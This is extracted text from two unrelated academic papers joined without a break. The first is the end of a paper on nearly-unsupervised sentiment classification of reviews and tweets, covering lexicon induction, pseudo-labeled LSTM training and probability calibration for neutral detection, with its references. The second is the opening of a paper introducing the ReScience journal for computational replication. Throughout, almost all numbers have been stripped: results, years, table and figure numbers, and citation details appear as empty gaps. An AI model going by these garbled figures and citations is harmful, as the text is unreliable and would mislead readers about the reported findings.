table : lexicon-based sentiment classification of amazon kitchen product reviews. rows: the general-purpose gi+bl lexicon, and domain-specific lexicons induced from the same domain (kitchen) and from different domains (electronics, video). columns: binary classification (mif , maf , f pos, f neg) and five-point scale classification (cohen's κ, rmse).

table : sentiment classification of long texts. rows: unsupervised lexicon-based methods (psenti with an existing general-purpose lexicon, psenti with the induced domain-specific lexicon, problex-dcm), learning-based methods trained on pseudo-labeled data (svmlin, cnn, lstm), and supervised lstm trained on real labeled data (full, / , / , and / sizes). columns: auc and f on imdb and amazon.

. sentiment classification of short texts

to evaluate our proposed approach to sentiment classification of short texts, we have carried out experiments on the twitter sentiment classification benchmark dataset from semeval- task b (rosenthal et al., ), which is to classify tweets as either positive or negative. other than the training set of , tweets, we also collected unlabeled tweets using the twitter api. all the tweets would be pre-processed by replacing emoticons with their corresponding text representations and encoding urls by tokens. in addition to the twitter-domain seed words listed in table , we have also made use of common positive/negative emoticons, which are ubiquitous on twitter, as additional seeds for the task of sentiment lexicon induction. note that in all our experiments, we do not use the sentiment labels and the topic information provided in the training data.
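the tweet pre-processing described above (emoticons replaced by text tokens, urls encoded by a placeholder token) can be sketched as follows; the emoticon map and token names are illustrative, not those of the original code.

import re

EMOTICONS = {":)": " smile_positive ", ":-)": " smile_positive ",
             ":(": " frown_negative ", ":-(": " frown_negative "}
URL_RE = re.compile(r"https?://\S+")

def preprocess_tweet(text):
    text = URL_RE.sub(" <url> ", text)              # encode urls by a token
    for emo, token in EMOTICONS.items():            # emoticons -> text tokens
        text = text.replace(emo, token)
    return text.lower()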
making use of the provided training data and our own unlabeled data collected from twitter, we have constructed the domain-specific word embeddings, induced the sentiment lexicon, and bootstrapped the pseudo-labeled tweet data to train the binary tweet sentiment classifier. as the learning algorithm we have chosen an lstm with a hidden layer of units, which would be enough for tweets as they are quite short (with an average length of only words). the official performance measures for this short text sentiment classification task (rosenthal et al., ) include accuracy (acc) and f . although our approach is nearly-unsupervised (without any reliance on labeled documents), its performance on this benchmark dataset is comparable to that of supervised methods: it would be placed roughly in the middle of all the participating systems in this competition (see table ).

table : sentiment classification of short texts into two categories (semeval- task b), reporting acc and f for the all-positive and all-negative baselines, our lstm-based system, and the worst, median, and best supervised participating systems.

. detecting neutral sentiment

many real-world applications of sentiment classification (e.g., on social media) are not simply a binary classification task, but involve a neutral category as well. although many lexicon-based sentiment classifiers, including psenti, can detect neutral sentiment, extending the above learning-based sentiment classifier (trained on pseudo-labeled data) to recognize neutral sentiment is challenging. to investigate this issue, we have done experiments on the twitter sentiment classification benchmark dataset from semeval- task c (rosenthal et al., ), which is to classify tweets on an ordinal five-point scale (− , − , , + , + ) where represents the neutral class. one common way to handle neutral sentiment is to treat the set of neutral documents as a separate class for the classification algorithm, which is the method advocated by koppel and schler ( ). with the pseudo-labeled training examples of three classes (− : negative, : neutral, and + : positive), we tried both standard multi-class classification (hsu and lin, ) and ordinal classification (frank and hall, ). however, neither of them could deliver a reasonable performance. after carefully inspecting the classification results, we realised that it is very difficult to have a set of representative training examples with good coverage for the neutral class. this is because the neutral class is not homogeneous: a document could be neutral because it is equally positive and negative, or because it does not contain any sentiment. in practice, the latter case is seen more often than the former, and it implies that the neutral class is more often defined by the absence of sentiment word features rather than their presence, which is problematic for most supervised learning algorithms. what we discovered is that the simple method of identifying neutral documents from the binary sentiment classifier's decision boundary works surprisingly well, as long as the right thresholds are found. specifically, we take the probabilistic outputs of a binary sentiment classifier trained as before, and then put all the documents whose probability of being positive lies not close to , not close to , but in the middle range into the neutral class. it turns out that probability calibration (niculescu-mizil and caruana, ) is crucially important for this simple method to work.
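the decision-boundary rule itself is simple, as the sketch below shows: a document is labelled neutral when its calibrated probability of being positive falls inside a middle band [pl, pu]; the band limits used here are placeholders, since the actual thresholds are determined from the probability curve as described next.

def ternary_label(p_positive, p_lo=0.35, p_hi=0.65):
    # p_lo and p_hi are placeholder thresholds; see the elbow search below
    if p_positive < p_lo:
        return -1      # negative
    if p_positive > p_hi:
        return +1      # positive
    return 0           # neutral

# labels = [ternary_label(p) for p in calibrated_probabilities]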
some supervised learning algorithms for classification can give poor estimates of the class probabilities, and some do not even support probability prediction. for instance, maximum-margin learning algorithms such as svm focus on hard samples that are close to the decision boundary (the support vectors), which makes their probability prediction biased. the technique of probability calibration allows us to better calibrate the probabilities of a given classifier, or to add support for probability prediction. if a classifier is well calibrated, its probabilistic output should be able to be directly interpreted as a confidence level on the prediction. for example, among the documents to which such a calibrated binary classifier gives a probabilistic output close to . , approximately % of the documents would actually belong to the positive class. using the sigmoid model of platt ( ) with cross-validation on the pseudo-labeled training data, we carry out probability calibration for our lstm-based binary sentiment classifier. fig. shows that the calibrated probability prediction aligns with the true confidence of prediction much better than the raw probability prediction. in this case, the brier loss (brier, ), which measures the mean squared difference between the predicted probability and the actual outcome, could be reduced from . to . by probability calibration.

figure : the probability calibration plot of our lstm-based sentiment classifier on the semeval- task c dataset (fraction of positives vs. mean predicted value, for the raw, calibrated, and perfectly calibrated predictions).

if we rank the estimated probabilities of being positive from low to high, the curve of probabilities would be in an "s"-shape with a distinct middle range where the slope is steeper than at the two ends, as shown in fig. . the documents with their probabilities of being positive in such a middle range should be neutral. therefore the two elbow points in the probability curve would make appropriate thresholds for the identification of neutral sentiment, and they could be found automatically by a simple algorithm using the central difference to approximate the second derivative. let pl and pu denote the identified thresholds (pl < pu); we then assign class label "− " to all those documents with the probability below pl, "+ " to all those documents with the probability above pu, and " " to all those documents with the probability within [pl, pu].

figure : the probability curve (probability vs. percentile) with a region of intermediate probabilities representing the neutral class; (a) raw, (b) calibrated.

the official performance measures for this sentiment classification task (rosenthal et al., ) are maeµ and maem, which stand for micro-averaged and macro-averaged mean absolute error (mae), respectively. we would also like to report the micro-averaged and macro-averaged f scores, which are denoted as mif and maf respectively. as shown in fig. , the thresholds identified from the raw probability curve are roughly at percentile and percentile, which would yield maeµ = . and maem = . ; the thresholds identified from the calibrated probability curve are roughly at percentile and percentile, which would yield much better scores maeµ = . and maem = . .
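a possible implementation of this elbow search is sketched below: it sorts the calibrated probabilities, approximates the curvature of the resulting "s"-shaped curve with central differences, and takes the strongest convex and concave elbows as pl and pu; the details of this implementation are our own assumptions rather than a description of the original code.

import numpy as np

def find_elbows(p_positive):
    p = np.sort(np.asarray(p_positive))
    # central-difference approximation of the second derivative of the curve
    second = p[2:] - 2 * p[1:-1] + p[:-2]
    half = len(second) // 2
    lower, upper = second[:half], second[half:]
    p_l = p[1 + int(np.argmax(lower))]           # strongest convex elbow (lower)
    p_u = p[1 + half + int(np.argmin(upper))]    # strongest concave elbow (upper)
    return p_l, p_u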
so with the help of probability calibration, our proposed approach would be able to comfortably beat all the baselines, including the lexicon-based method psenti (mudinas et al., ), and compete with the average (median) participating systems (see table ). please note that this is not a fair comparison: our approach is at a great disadvantage because (i) it is nearly-unsupervised, without any reliance on labeled documents, while all the other systems are supervised; and (ii) it performs only ternary classification, while all the other systems make classifications on the full five-point scale.

table : sentiment classification of short texts on a five-point scale (semeval- task c), reporting maeµ, maem, mif , and maf for the all − , all − , all , all + , and all + baselines, the lexicon-based method, our lstm-based system, and the worst, median, and best supervised participating systems.

conclusions

how far can we go in sentiment classification for a new domain, given only unlabeled data? this paper presents our exploration towards answering the above research question. specifically, the main contributions of this paper are as follows.
• we have formulated the cluster hypothesis for sentiment analysis (i.e., words with different sentiment polarities form distinct clusters) and verified that in general it holds for word embeddings within a specific domain but not across domains.
• we have demonstrated that a quality domain-specific sentiment lexicon can be induced from the word embeddings of that domain together with just a few seed words. surprisingly, simple linear model based supervised learning algorithms (such as linear svm) are good enough for this purpose; there is no benefit of utilizing non-linear models or semi-supervised/transductive learning algorithms due to the noise at the borders of sentiment word clusters. using such linear models, our system clearly outperforms the state-of-the-art sentiment lexicon induction method, sentprop (hamilton et al., ).
• we have shown that a lexicon-based sentiment classifier could be enhanced by using its outputs as pseudo-labels and employing supervised learning algorithms such as lstm to train a learning-based sentiment classifier on pseudo-labeled documents. our end-to-end pipelined approach, which overall is unsupervised (except for a very small set of seed words), works better than the state-of-the-art unsupervised technique for document sentiment classification, problex-dcm (eisenstein, ), and its performance is at least on par with an average fully supervised sentiment classifier trained on real labeled data (rosenthal et al., ).
• we have revealed the crucial importance of probability calibration to the detection of neutral sentiment, which was overlooked in previous studies (koppel and schler, ). with the right thresholds found, neutral documents can simply be identified at the binary sentiment classifier's decision boundary.
one promising way to further enhance the lstm-based sentiment classifier in the proposed approach with the induced sentiment lexicon would be to concatenate word embeddings with an indicator feature which tells whether the current word is positive, neutral, or negative (ebert et al., ). we leave this for future work.

acknowledgements

the titan x pascal gpu used for this research was kindly donated by the nvidia corporation. we thank the reviewers for their constructive and helpful comments. we also gratefully acknowledge the support of geek.ai for this work.

references

shlomo argamon, casey whitelaw, paul j.
chase, sob- han raj hota, navendu garg, and shlomo levitan. . stylistic text classification using functional lexi- cal features. journal of the american society for infor- mation science and technology (jasist), ( ): – . christopher m. bishop. . pattern recognition and machine learning. springer-verlag. john blitzer, mark dredze, and fernando pereira. . biographies, bollywood, boom-boxes and blenders: domain adaptation for sentiment classification. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl), pages –– , prague, czech republic. danushka bollegala, david j. weir, and john a. car- roll. . cross-domain sentiment classification us- ing a sentiment sensitive thesaurus. ieee transac- tions on knowledge and data engineering (tkde), ( ): – . johan bollen, huina mao, and xiao-jun zeng. . twitter mood predicts the stock market. journal of computational science, ( ): – . glenn w. brier. . verification of forecasts ex- pressed in terms of probability. monthly weather re- view, ( ): – . mathieu cliche. . bb twtr at semeval- task : twitter sentiment analysis with cnns and lstms. in proceedings of the th international workshop on se- mantic evaluation (semeval@acl ), pages – , vancouver, canada. andrew m. dai and quoc v. le. . semi-supervised sequence learning. in advances in neural information processing systems : annual conference on neural information processing systems (nips), pages – , montreal, canada. xiaowen ding, bing liu, and philip s. yu. . a holistic lexicon-based approach to opinion mining. in proceedings of the international conference on web search and web data mining (wsdm), pages – , palo alto, ca, usa. sebastian ebert, ngoc thang vu, and hinrich schütze. . a linguistically informed convolutional neu- ral network. in proceedings of the th workshop on computational approaches to subjectivity, sentiment and social media analysis (wassa@emnlp), pages – , lisbon, portugal. jacob eisenstein. . unsupervised learning for lexicon-based classification. in proceedings of the st aaai conference on artificial intelligence (aaai), pages – , san francisco, ca, usa. ethan fast, binbin chen, and michael s. bernstein. . empath: understanding topic signals in large- scale text. in proceedings of the chi conference on human factors in computing systems (chi), pages – , san jose, ca, usa. eibe frank and mark a. hall. . a simple approach to ordinal classification. in proceedings of the th european conference on machine learning (ecml), pages – , freiburg, germany. fabian gieseke, antti airola, tapio pahikkala, and oliver kramer. . sparse quasi-newton opti- mization for semi-supervised support vector machines. in proceedings of the st international conference on pattern recognition applications and methods (icpram), pages – , vilamoura, algarve, portu- gal. xavier glorot, antoine bordes, and yoshua bengio. . domain adaptation for large-scale sentiment classification: a deep learning approach. in pro- ceedings of the th international conference on ma- chine learning (icml), pages – , bellevue, wa, usa. yoav goldberg. . neural network methods for natu- ral language processing. synthesis lectures on human language technologies, ( ): – . klaus greff, rupesh kumar srivastava, jan koutnı́k, bas r. steunebrink, and jürgen schmidhuber. . lstm: a search space odyssey. ieee transactions on neural networks and learning systems (tnnls), ( ): – . william l. hamilton, kevin clark, jure leskovec, and dan jurafsky. . 
inducing domain-specific senti- ment lexicons from unlabeled corpora. in proceedings of the conference on empirical methods in nat- ural language processing (emnlp), pages – , austin, tx, usa. trevor hastie, robert tibshirani, and jerome friedman. . the elements of statistical learning: data mining, inference, and prediction. springer, nd edi- tion. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . james hong and michael fang. . sentiment anal- ysis with deeply learned distributed representations of variable length texts. technical report, stanford uni- versity. chih-wei hsu and chih-jen lin. . a comparison of methods for multiclass support vector machines. ieee transactions on neural networks (tnn), ( ): – . minqing hu and bing liu. . mining and summa- rizing customer reviews. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining (kdd), pages – , seattle, wa, usa. yohan jo and alice h. oh. . aspect and sentiment unification model for online review analysis. in pro- ceedings of the th international conference on web search and web data mining (wsdm), pages – , hong kong, china. thorsten joachims. . text categorization with sup- port vector machines: learning with many relevant features. in proceedings of the th european confer- ence on machine learning (ecml), pages – , chemnitz, germany. thorsten joachims. . transductive inference for text classification using support vector machines. in proceedings of the th international conference on machine learning (icml), pages – , bled, slovenia. thorsten joachims. . transductive learning via spectral graph partitioning. in proceedings of the th international conference on machine learning (icml), pages – , washington, dc, usa. yoon kim. . convolutional neural networks for sen- tence classification. in proceedings of the con- ference on empirical methods in natural language processing (emnlp), pages – , doha, qatar. moshe koppel and jonathan schler. . the im- portance of neutral examples for learning sentiment. computational intelligence, ( ): – . yann lecun, yoshua bengio, and geoffrey e. hinton. . deep learning. nature, ( ): – . heeyoung lee, mihai surdeanu, bill maccartney, and dan jurafsky. . on the importance of text anal- ysis for stock price prediction. in proceedings of the th international conference on language resources and evaluation (lrec), pages – , reykjavik, iceland. chenghua lin and yulan he. . joint sentiment/topic model for sentiment analysis. in proceedings of the th acm conference on information and knowledge management (cikm), pages – , hong kong, china. bing liu. . sentiment analysis and opinion mining. synthesis lectures on human language technologies, ( ): – . bing liu. . sentiment analysis — mining opin- ions, sentiments, and emotions. cambridge univer- sity press. marco loog. . contrastive pessimistic likelihood estimation for semi-supervised classification. ieee transactions on pattern analysis and machine intel- ligence (tpami), ( ): – . andrew l. maas, raymond e. daly, peter t. pham, dan huang, andrew y. ng, and christopher potts. . learning word vectors for sentiment analysis. in pro- ceedings of the th annual meeting of the association for computational linguistics (acl), pages – , portland, or, usa. christopher d. manning, prabhakar raghavan, and hin- rich schütze. . introduction to information re- trieval. cambridge university press. julian j. mcauley and jure leskovec. . 
hidden fac- tors and hidden topics: understanding rating dimen- sions with review text. in proceedings of the th acm conference on recommender systems (recsys), pages – , hong kong, china. tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. . distributed rep- resentations of words and phrases and their composi- tionality. in advances in neural information process- ing systems : annual conference on neural infor- mation processing systems (nips), pages – , lake tahoe, nv, usa. george a miller and walter g charles. . contex- tual correlates of semantic similarity. language and cognitive processes, ( ): – . saif m. mohammad and peter d. turney. . emo- tions evoked by common words and phrases: using mechanical turk to create an emotion lexicon. in pro- ceedings of the naacl hlt workshop on com- putational approaches to analysis and generation of emotion in text (caaget), pages – , los ange- les, ca, usa. andrius mudinas, dell zhang, and mark levene. . combining lexicon and learning based approaches for concept-level sentiment analysis. in proceedings of the st international workshop on issues of sentiment discovery and opinion mining (wisdom@kdd), pages : – : , beijing, china. alexandru niculescu-mizil and rich caruana. . predicting good probabilities with supervised learning. in proceedings of the nd international conference on machine learning (icml), pages – , bonn, germany. sara owsley, sanjay sood, and kristian j. hammond. . domain specific affective classification of doc- uments. in aaai spring symposium: computational approaches to analyzing weblogs, pages – , stanford, ca, usa. sinno jialin pan, xiaochuan ni, jian-tao sun, qiang yang, and zheng chen. . cross-domain senti- ment classification via spectral feature alignment. in proceedings of the th international conference on world wide web (www), pages – , raleigh, nc, usa. bo pang and lillian lee. . a sentimental education: sentiment analysis using subjectivity summarization based on minimum cuts. in proceedings of the nd annual meeting of the association for computational linguistics (acl), pages – , barcelona, spain. bo pang, lillian lee, and shivakumar vaithyanathan. . thumbs up? sentiment classification using ma- chine learning techniques. in proceedings of the acl- conference on empirical methods in natural lan- guage processing (emnlp), pages – , strouds- burg, pa, usa. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word rep- resentation. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar. john platt, . advances in large margin classi- fiers, chapter probabilistic outputs for support vector machines and comparisons to regularized likelihood methods. mit press. robert plutchik, . approaches to emotion, chap- ter emotions: a general psychoevolutionary theory, pages – . psychology press. guang qiu, bing liu, jiajun bu, and chun chen. . opinion word expansion and target extraction through double propagation. computational linguis- tics, ( ): – . alec radford, rafal józefowicz, and ilya sutskever. . learning to generate reviews and discovering sentiment. corr, abs/ . . filipe n ribeiro, matheus araújo, pollyanna gonçalves, marcos andré gonçalves, and fabrı́cio benevenuto. . sentibench — a benchmark comparison of state-of-the-practice sentiment analysis methods. epj data science, ( ): – . sara rosenthal, preslav nakov, svetlana kiritchenko, saif mohammad, alan ritter, and veselin stoyanov. . 
semeval- task : sentiment analysis in twitter. in proceedings of the th international work- shop on semantic evaluation (semeval@naacl- hlt), pages – , denver, co, usa. sara rosenthal, noura farra, and preslav nakov. . semeval- task : sentiment analysis in twit- ter. in proceedings of the th international workshop on semantic evaluation (semeval@acl), pages – , vancouver, canada. sascha rothe, sebastian ebert, and hinrich schütze. . ultradense word embeddings by orthogonal transformation. in proceedings of the con- ference of the north american chapter of the asso- ciation for computational linguistics: human lan- guage technologies (hlt-naacl), pages – , san diego, ca, usa. nitish srivastava, geoffrey e. hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning re- search (jmlr), ( ): – . philip j. stone, dexter c. dunphy, marshall s. smith, and daniel m. ogilvie. . the general inquirer: a computer approach to content analysis. mit press. songbo tan, xueqi cheng, yuefen wang, and hongbo xu. . adapting naı̈ve bayes to domain adapta- tion for sentiment analysis. in proceedings of the th european conference on ir research (ecir), pages – , toulouse, france. mike thelwall, kevan buckley, georgios paltoglou, di cai, and arvid kappas. . sentiment strength detection in short informal text. journal of the amer- ican society for information science and technology (jasist), ( ): – . mike thelwall, kevan buckley, and georgios paltoglou. . sentiment strength detection for the social web. journal of the american society for information sci- ence and technology (jasist), ( ): – . peter d. turney. . thumbs up or thumbs down? semantic orientation applied to unsupervised classifi- cation of reviews. in proceedings of the th annual meeting of the association for computational linguis- tics (acl), pages – , philadelphia, pa, usa. laurens van der maaten and geoffrey e. hinton. . visualizing data using t-sne. journal of machine learning research (jmlr), (nov): – . stefan wager, sida i. wang, and percy liang. . dropout training as adaptive regularization. in ad- vances in neural information processing systems : annual conference on neural information process- ing systems (nips), pages – , lake tahoe, nv, usa. amy beth warriner, victor kuperman, and marc brys- baert. . norms of valence, arousal, and domi- nance for , english lemmas. behavior research methods, ( ): – . rui xia, chengqing zong, xuelei hu, and erik cambria. . feature ensemble plus sample selection: do- main adaptation for sentiment classification. ieee in- telligent systems, ( ): – . yi yang and jacob eisenstein. . putting things in context: community-specific embedding projections for sentiment analysis. corr, abs/ . . yiming yang and xin liu. . a re-examination of text categorization methods. in proceedings of the nd annual international acm sigir conference on research and development in information retrieval (sigir), pages – , berkeley, ca, usa. yasuhisa yoshida, tsutomu hirao, tomoharu iwata, masaaki nagata, and yuji matsumoto. . trans- fer learning for multiple-domain sentiment analysis - identifying domain dependent/independent word po- larity. in proceedings of the th aaai conference on artificial intelligence (aaai), san francisco, ca, usa. lei zhang, riddhiman ghosh, mohamed dekhil, me- ichun hsu, and bing liu. . combining lexicon- based and learning-based methods for twitter senti- ment analysis. 
technical report hpl- - , hp laboratories. xiaojin zhu, zoubin ghahramani, and john d. lafferty. . semi-supervised learning using gaussian fields and harmonic functions. in proceedings of the th international conference on machine learning (icml), pages – , washington, dc, usa.

submitted october accepted november published december corresponding author nicolas p. rougier, nicolas.rougier@inria.fr academic editor feng xia additional information and declarations can be found on page doi . /peerj-cs. copyright rougier et al. distributed under creative commons cc-by . open access

sustainable computational science: the rescience initiative

nicolas p. rougier , konrad hinsen , frédéric alexandre , thomas arildsen , lorena a. barba , fabien c.y. benureau , c. titus brown , pierre de buyl , ozan caglayan , andrew p. davison , marc-andré delsuc , georgios detorakis , alexandra k. diem , damien drix , pierre enel , benoît girard , olivia guest , matt g. hall , rafael n. henriques , xavier hinaut , kamil s. jaron , mehdi khamassi , almar klein , tiina manninen , pietro marchesi , daniel mcglinn , christoph metzner , owen petchey , hans ekkehard plesser , timothée poisot , karthik ram , yoav ram , etienne roesch , cyrille rossant , vahid rostami , aaron shifman , joseph stachelek , marcel stimberg , frank stollmeier , federico vaggi , guillaume viejo , julien vitay , anya e.
vostinar , roman yurchak and tiziano zito inria bordeaux sud-ouest, talence, france centre de biophysique moléculaire upr , cnrs, orléans, france department of electronic systems, technical faculty of it and design, aalborg university, aalborg, denmark department of mechanical and aerospace engineering, the george washington university, washington, d.c., usa department of population health and reproduction, university of california davis, davis, ca, usa instituut voor theoretische fysica, ku leuven, leuven, belgium laboratoire d’informatique (lium), le mans university, le mans, france unic fre , cnrs, gif-sur-yvette, france institut de génétique et de biologie moléculaire et cellulaire, illkirch, france department of cognitive sciences, university of california irvine, irvine, ca, usa computational engineering and design, university of southampton, southampton, united kingdom humboldt universität zu berlin, berlin, germany department of neuroscience, mount sinai school of medicine, new york, ny, usa institute of intelligent systems and robotics, sorbonne universités - upmc univ paris - cnrs, paris, france experimental psychology, university college london, london, greater london, united kingdom ucl great ormond st institute of child health, london, united kingdom champalimaud centre for the unknown, champalimaud neuroscience program, lisbon, portugal department of ecology and evolution, university of lausanne, lausanne, switzerland independent scholar, enschede, the netherlands biomeditech institute and faculty of biomedical sciences and engineering, tampere university of technology, tampere, finland swammerdam institute for life sciences, university of amsterdam, amsterdam, the netherlands department of biology, college of charleston, charleston, sc, usa centre for computer science and informatics research, university of hertfordshire, hatfield, united kingdom department of evolutionary biology and environmental studies, university of zurich, zurich, switzerland faculty of science and technology, norwegian university of life sciences, aas, norway département de sciences biologiques, université de montréal, montréal, qc, canada berkeley institute for data science, university of california, berkeley, ca, usa department of biology, stanford university, stanford, ca, usa centre for integrative neuroscience, university of reading, reading, united kingdom institute of neurology, university college london, london, united kingdom how to cite this article rougier et al. ( ), sustainable computational science: the rescience initiative. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:nicolas.rougier@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. 
institute of neuroscience & medicine, juelich forschungszentrum, jülich, germany department of biology, university of ottawa, ottawa, ontario, canada department of fisheries and wildlife, michigan state university, east lansing, mi, usa sorbonne universités/upmc univ paris /inserm/cnrs/institut de la vision, paris, france max planck institute for dynamics and self-organization, göttingen, lower saxony, germany amazon, seattle, wa, usa department of computer science, chemnitz university of technology, chemnitz, saxony, germany department of computer science, grinnell college, grinnell, ia, usa symerio, palaiseau, france neural information processing group, eberhard karls universität tübingen, tübingen, germany abstract computer science offers a large set of tools for prototyping, writing, running, testing, validating, sharing and reproducing results; however, computational science lags behind. in the best case, authors may provide their source code as a compressed archive and they may feel confident their research is reproducible. but this is not exactly true. james buckheit and david donoho proposed more than two decades ago that an article about computational results is advertising, not scholarship. the actual scholarship is the full software environment, code, and data that produced the result. this implies new workflows, in particular in peer-reviews. existing journals have been slow to adapt: source codes are rarely requested and are hardly ever actually executed to check that they produce the results advertised in the article. rescience is a peer-reviewed journal that targets computational research and encourages the explicit replication of already published research, promoting new and open-source implementations in order to ensure that the original research can be replicated from its description. to achieve this goal, the whole publishing chain is radically different from other traditional scientific journals. rescience resides on github where each new implementation of a computational study is made available together with comments, explanations, and software tests. subjects data science, digital libraries, scientific computing and simulation, social computing keywords computational science, open science, publication, reproducible, replicable, sustainable, github, open peer-review introduction there is a replication crisis in science (baker, ; munafò et al., ). this crisis has been highlighted in fields as diverse as medicine (ioannidis, ), psychology (open science collaboration, ), the political sciences (janz, ), and recently in the biomedical sciences (iqbal et al., ). the reasons behind such non-replicability are as diverse as the domains in which it occurs. in medicine, factors such as study power and bias, the number of other studies on the same question, and importantly, the ratio of true to no relationships among the all relationships probed have been highlighted as important causes (ioannidis, ). in psychology, non-replicability has been blamed on spurious p-values (p-hacking), while in the biomedical sciences (iqbal et al., ), a lack of access to full datasets and rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. detailed protocols for both clinical and non-clinical biomedical investigation is seen as a critical factor. the same remarks were recently issued for chemistry (coudert, ). 
surprisingly, the computational sciences (in the broad sense) and computer sciences (in the strict sense) are no exception (donoho et al., ; manninen, havela & linne, ) despite the fact they rely on code and data rather than on experimental observations, which should make them immune to the aforementioned problems. when colberg and colleagues ( ) decided to measure the extent of the problem precisely, they investigated the availability of code and data as well as the extent to which this code would actually build with reasonable effort. the results were dramatic: of the (out of ) potentially reproducible papers targeted by the study, the authors managed to ultimately run only (less than %). these low numbers only reflect the authors’ success at running the code. they did not check for correctness of the code (i.e., does the code actually implement what is advertised in the paper), nor the reproducibility of the results (does each run lead to the same results as in the paper). one example of this problem can be found in topalidou et al. ( ), in which the authors tried to replicate results obtained from a computational neuroscience model. source code was not available, neither as supplementary material to the paper nor in a public repository. when the replicators obtained the source code after contacting the corresponding author, they found that it could not be compiled and would be difficult to reuse for other purposes. confronted with this problem, a small but growing number of journals and publishers have reacted by adopting explicit policies for data and software. examples can be seen in the plos instructions on materials and software sharing and on data availability, and in the recent announcement by elife on forking (creating a linked copy of) software used in elife papers to github. such policies help to ensure access to code and data in a well-defined format (perkel, ) but this will not guarantee reproducibility nor correctness. at the educational and methodological levels, things have started to change with a growing literature on best practices for making computations reproducible (sandve et al., ; crook, davison & plesser, ; wilson et al., ; halchenko & hanke, ; janz, ; hinsen, ). related initiatives such as software and data carpentry (wilson, ) are of note since their goal is to make scientists more productive, and their work more reliable, by teaching them basic computing skills. such best practices could be applied to already published research codebases as well, provided the original authors are willing to take on the challenge of re-implementing their software for the sake of better science. unfortunately, this is unlikely since the incentives for doing such time-consuming work are low or nonexistent. furthermore, if the original authors made mistakes in their original implementation, it seems likely that they will reproduce their mistakes in any re-implementation. replication and reproduction while recognition of the replication crisis as a problem for scientific research has increased over time, unfortunately no common terminology has emerged so far. one reason for the diverse use of terms is that each field of research has its own specific technical and rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://journals.plos.org/plosone/s/materials-and-software-sharing http://journals.plos.org/plosone/s/data-availability https://elifesciences.org/elife-news/inside-elife-forking-software-used-elife-papers-github http://dx.doi.org/ . /peerj-cs. 
social obstacles on the road to publishing results and findings that can be verified by other scientists. here we briefly summarize the obstacles that arise from the use of computers and software in scientific research, and introduce the terminology we will use in the rest of this article. we note, however, that there is some disagreement about this particular choice of terminology even among the authors of this article. reproducing the result of a computation means running the same software on the same input data and obtaining the same results. the goal of a reproduction attempt is to verify that the computational protocol leading to the results has been recorded correctly. performing computations reproducibly can be seen as a form of provenance tracking, the software being a detailed record of all data processing steps. in theory, computation is a deterministic process and exact reproduction should therefore be trivial. in reality, it is very difficult to achieve because of the complexity of today’s software stacks and the tediousness of recording all interactions between a scientist and a computer (although a number of recent tools have attempted to automate such recording, e.g., guo & engler, ; davison, ; murta et al., ). mesnard and barba explain (mesnard & barba, ) how difficult it can be to reproduce a two-year-old computation even though all possible precautions were taken at the time to ensure reproducibility. the most frequent obstacles are the loss of parts of the software or input data, lack of a computing environment that is sufficiently similar to the one used initially, and insufficient instructions for making the software work. an obstacle specific to numerical computations is the use of floating-point arithmetic, whose rules are subject to slightly different interpretations by different compilers and runtime support systems. a large variety of research practices and support tools have been developed recently to facilitate reproducible computations. for a collection of recipes that have proven useful, see kitzes, turek & deniz ( ). publishing a reproducible computational result implies publishing all the software and all the input data, or references to previously published software and data, along with the traditional article describing the work. an obvious added value is the availability of the software and data, which helps readers to gain a better understanding of the work, and can be re-used in other research projects. in addition, reproducibly published results are more trustworthy, because many common mistakes in working with computers can be excluded: mistyping parameter values or input file names, updating the software but forgetting to mention the changes in the description of the method, planning to use one version of some software but actually using a different one, etc. strictly speaking, reproducibility is defined in the context of identical computational environments. however, useful scientific software is expected to be robust with respect to certain changes in this environment. a computer program that produces different results when compiled using different compilers, or run on two different computers, would be considered suspect by most practitioners, even if it were demonstrably correct in one specific environment. ultimately it is not the software that is of interest for science, but the models and methods that it implements. the software is merely a vehicle to perform computations based on these models and methods. 
if results depend on hard-to-control rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implementation details of the software, their relation to the underlying models and methods becomes unclear and unreliable. replicating a published result means writing and then running new software based on the description of a computational model or method provided in the original publication, and obtaining results that are similar enough to be considered equivalent. what exactly ‘‘similar enough’’ means strongly depends on the kind of computation being performed, and can only be judged by an expert in the field. the main obstacle to replicability is an incomplete or imprecise description of the models and methods. replicability is a much stronger quality indicator than reproducibility. in fact, reproducibility merely guarantees that all the ingredients of a computation are well documented. it does not imply that any of them are correct and/or appropriate for implementing the models and methods that were meant to be applied, nor that the descriptions of these models and methods are correct and clear. a successful replication shows that two teams have produced independent implementations that generate equivalent results, which makes serious mistakes in either implementation unlikely. moreover, it shows that the second team was able to understand the description provided by the first team. replication can be attempted for both reproducible and non-reproducible results. however, when an attempt to replicate non-reproducible work fails, yielding results too different to be considered equivalent, it can be very difficult to identify the cause of the disagreement. reproducibility guarantees the existence of a precise and complete description of the models and methods being applied in the original work, in the form of software source code, which can be analyzed during the investigation of any discrepancies. the holy grail of computational science is therefore a reproducible replication of reproducible original work. the rescience initiative performing a replication is a daunting task that is traditionally not well rewarded. nevertheless, some people are willing to replicate computational research. the motivations for doing so are very diverse (see box ). students may want to familiarize themselves with a specific scientific domain, and acquire relevant practical experience by replicating important published work. senior researchers may critically need a specific piece of code for a research project and therefore re-implement a published computational method. if these people write a brand new open source implementation of already published research, it is likely that this new implementation will be of interest for other people as well, including the original authors. the question is where to publish such a replication. to the best of our knowledge, no major journal accepts replications in computational science for publication. this was the main motivation for the creation of the rescience journal (https://rescience.github.io) by konrad hinsen and nicolas p. rougier in september . rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com 